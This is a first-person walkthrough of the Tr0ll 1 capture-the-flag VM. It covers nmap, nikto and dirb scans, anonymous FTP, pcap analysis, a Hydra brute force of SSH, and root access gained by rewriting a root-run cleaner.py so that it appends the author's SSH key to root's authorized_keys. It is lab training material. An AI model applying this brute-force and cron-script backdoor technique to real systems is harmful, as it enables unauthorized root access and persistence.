This is my walkthrough for defeating Tr0ll infosec challenge.  This is another great “boot2root” VM  that kept my guessing quite a few times.  It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test.  I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book).  So I sit down at my setup and begin.

The Tr0ll VM can be downloaded from
http://vulnhub.com/entry/tr0ll-1,100/

Footprinting:

After loading up the VM I use netdiscover -r to find it’s IP address which was 192.168.2.40

Scanning:

Now I start by seeing what Nmap can tell me about this system.

[email protected]:~/Desktop# nmap -sV -P0 -A 192.168.2.40

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for 192.168.2.40
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=8/19%Time=53F3705E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,”SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n”);
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.46%E=4%D=8/19%OT=21%CT=1%CU=31767%PV=Y%DS=1

%DC=D%G=Y%M=080027%T
OS:M=53F3706A%P=x86_64-unknown-linux-gnu)SEQ(SP=106%GCD=1%ISR

=109%TI=Z%CI=I
OS:%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3

=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4

=7120%W5=71
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)

T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W

=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK

=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.2.40

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

Enumeration:

Since the webserver is enabled I’ll continue to gather intel even though I really want to check out the FTP anonymous service that’s running.  But patience really is a key to beating a lot of these challenges.

[email protected]:~# nikto -h http://192.168.2.40
– Nikto v2.1.6
—————————————————————————
+ Target IP:          192.168.2.40
+ Target Hostname:    192.168.2.40
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ File/dir ‘/secret/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
—————————————————————————
+ 1 host(s) tested

I also continue enumerating the webserver with dirb since it’s just part of my methodology and you just never know.

[email protected]:~# dirb http://192.168.2.40
—————–
DIRB v2.21
By The Dark Raver
—————–

START_TIME: Tue Aug 19 11:45:38 2014
URL_BASE: http://192.168.2.40/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4592

—- Scanning URL: http://192.168.2.40/ —-
+ http://192.168.2.40/index.html (CODE:200|SIZE:36)
+ http://192.168.2.40/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.2.40/secret/
+ http://192.168.2.40/server-status (CODE:403|SIZE:292)

—- Entering directory: http://192.168.2.40/secret/ —-
+ http://192.168.2.40/secret/index.html (CODE:200|SIZE:37)

—————–
DOWNLOADED: 9184 – FOUND: 4

Now my thinking is that I’ll check out the FTP service and then look into /secret web directory if FTP doesn’t lead anywhere.  But FTP has to come first because who finds anonymous FTP access anymore?  So this is at least interesting, which in my experience is a good indication that it will come into play at some point.  I also looked at SSH but that seems to be pretty normal and trying to exploit this version would prove to be pretty difficult so I’ll leave that as a last resort.  So the first attack vector to look into deeper is FTP.  I’ll see if anonymous FTP access on this server can provide any clues or further information.  If not then I’ll dig deeper into “vsftpd 3.0.2” to see what type of exploits are available for that version.

The anonymous FTP contains only a single file called “lol.pcap” which has really peaked my interest.  I go ahead and look up “vsftpd 3.0.2” exploits but nothing really pops out immediately so I’ll put that on the back burner for now and focus on the pcap file.

[email protected]:~# ftp 192.168.2.40
Connected to 192.168.2.40.
220 (vsFTPd 3.0.2)
Name (192.168.2.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 “/”
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)

My next step is to copy “lol.pcap” over to my machine and load this up in Wireshark and see what kind of traffic it has.  Hopefully there will be some useful information for me to use.

So I see an FTP data session that shows a file transfer.  Luckily FTP uses cleartext so I’ll be able to dig deeper into this.  I can see a file that was transferred called “secret_stuff.txt”.  I reconstruct the FTP transfer and what do you know?  It gives me a nice little message.

Ok I can see that @maleus21 is messing with me.  I go over the traffic several more times to make sure that I didn’t miss anything but it looks like I’ve found all the useful information.  And of course I continue to feel mocked.

My only clue here is that “sup3rs3cr3tdirlol” is mentioning a directory.  Since FTP doesn’t have anything more for me and I have no SSH information to go on my only hope is the webserver.  So I whisper “Help me Apache 2.4.7….Your my only hope.”  First I try out the /secret that I discovered earlier.  But this is another dead end belittling my skills.  But I check the source of the page just to make sure but it’s definitley a dead end.

With limited services running on this box I’m hoping that “sup3rs3cr3tdirlol” or “sup3rs3cr3t” is a web directory since I’m not really seeing any other options at the moment.  So I try /sup3rs3cr3tdirlol as this is really my only move at this point.  Fingers crossed and BOOM!, I’ve got something.  This is when the little tingling feeling starts filling up my stomach.

Awesome, that worked and now I’ve got a file called “roflmao”.  Let me check this out.

[email protected]:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped

Ok so it’s a 32-bit ELF file.  Let me see what else I can find out about it.

[email protected]:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2’s complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX – System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27

Everything looks pretty normal in the file and I don’t see anything slapping me in the face so it’s time to run “roflmao” and find out what it does.

 

[email protected]:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to [email protected]:~/Desktop/Troll#

My immediate thought is that 0x0856BF is a memory address which starts making me sweat.  Like all the great hackers before me whenever I get stuck, I stop and ask myself.  What would Zero Cool do?  Lol, actually I would never think that but it does make for a better story doesn’t it?

My actual thought is this.  What’s the simplest solution?  What do I know so far about this system?  What do I know about how Maleus thinks so far?  And my subconscious whispers “directory” which makes sense since it’s clear that Maleus likes using obscure directories as we’ve already seen.

Hacker Pro Tip:   Don’t over complicate things.  Remember KISS?  This type of thinking has saved me more times than I can remember.  Plus I’m always looking for shortest distance to an objective since I’m lazy.  So why not try “0x0856BF” as a web directory since it will literally take 4 seconds.

So I go for the long shot and try /0x0856BF.  Awesome, it is and more stuff is revealed.  Two directories.

The first is /good_luck and the second
is /this_folder_contains_the_password.  I check out the first folder and find this text file.

/0x0856BF/good_luck/which_one_lol.txt

Which contains the following.

maleus
ps-aux
felux
Eagle11
genphlux < — Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

So these look like user names so now I check out the second one.  The second folder contains this file.

/0x0856BF/this_folder_contains_the_password/Pass.txt

Which has a nice little message.

Good_job_:)

Since FTP seems to be setup for anonymous access only I’m going to focus on SSH for the time being.  I’m going to use Hydra to automate logging in with these accounts and “Good_job_:)” as the password.

So after several attempts I begin to get banned.

I’m not sure about the timeout since I control the VM.  I keep on rebooting the VM and trying again but it’s the same story again and again.  The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.

After trying all the accounts with “Good_job_:)” and getting no luck I stop and take a break to clear my head.  I’m clearly missing something.  After some time away I come back and go through everything again to see what I’ve missed.  Knowing myself it’s probably some small detail that I’ve overlooked.  I start looking at things a little more closely to see if I could come up with a few more passwords to try.  That’s where reading the folder gave me the idea for two more password choices so my password list became this.

Pass
Pass.txt

After trial and error and numerous more reboots I finally get a match for “overflow” and “Pass.txt”.  Sweet!

 

Gaining Access:

Shell – Here I come.

As soon as I start looking around I get this message and I’m booted.

Broadcast Message from [email protected]
(somewhere) at 10:00 …

TIMES UP LOL!

Connection to 192.168.2.40 closed by remote host.
Connection to 192.168.2.40 closed.

Ok so it looks like my session is being timed out.  I log back in and do a quick run through for any files that catch my eye.

$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt  2 root root 4096 Sep  2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx  1 root root   34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you’d think but doesn’t provide any other information.

Even though overflow is a low level user I do a “find / -name cleaner.py” anyway to save some time.

Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a “ls -al” shows it’s owned by root.  This could be good.

I use VI to see what’s going on.

#!/usr/bin/env python
import os
import sys
try:
os.system(‘rm -r /tmp/* ‘)
except:
sys.exit()

Knowing that root owns this file and seeing os.system I know what my next move is going to be.  I’m going to have os.system echo my ssh key into the authorized_keys for root.  I’ve never actually done this all in a single line but it should work (at least in theory).

So here’s what cleaner.py ends up looking like. (I’ve shorten my key to save space but you get the point.)

#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+xG0sTfjf73

CqR0lKO8+rUyUTCJTzWpjWh9zf2/tHEiXjGAveBwiay1vLsGFEO47QXmyu+lRgFjg

== [email protected]” >> /root/.ssh/authorized_keys ‘)
except:
sys.exit()

Now I save the file and wait for it to be kicked off.  What’s interesting is that when trying to save my changes in VI it comes up with a permissions error since I’m logged in as “overflow”.  But when using “cat” I can see that my changes have been saved.  Sweet luck for me!  After being disconnected it’s time to try to login as root.

And success!!  I’m logged into Tr0ll as root.  Then I looked to see if there is any type of flag.

[email protected]:/lib/log#
[email protected]:/lib/log# cd /root/
[email protected]:~# ls
proof.txt
[email protected]:~# cat proof.txt
Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc